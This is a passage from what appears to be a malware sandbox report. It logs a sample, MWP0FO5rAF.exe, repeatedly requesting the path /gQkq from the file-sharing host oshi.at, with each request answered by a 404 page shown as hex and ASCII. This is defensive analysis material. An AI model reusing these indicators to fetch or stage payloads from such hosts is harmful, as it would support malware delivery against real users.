                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.950007194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:55 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:56 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:56 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:56 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.950008194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:57 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:58 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:58 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:58 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.950009194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:02 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:03 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:03 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:03 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.950010194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:04 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:05 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:05 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:05 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.950011194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:06 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:08 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:08 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:08 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.950012194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:10 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:11 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:11 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:11 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.950013194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:12 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:13 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:13 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:13 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.950014194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:14 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:15 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:15 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:15 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            36192.168.2.950015194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:16 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:17 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:17 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:17 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            37192.168.2.950016194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:19 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:19 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:19 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:19 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            38192.168.2.950017194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:21 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:21 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:21 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:21 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            39192.168.2.950018194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:23 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:23 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:23 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:23 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            40192.168.2.950019194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:25 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:26 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:26 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:26 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            41192.168.2.950020194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:28 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:28 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:28 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:28 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            42192.168.2.950021194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:30 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:30 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:30 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
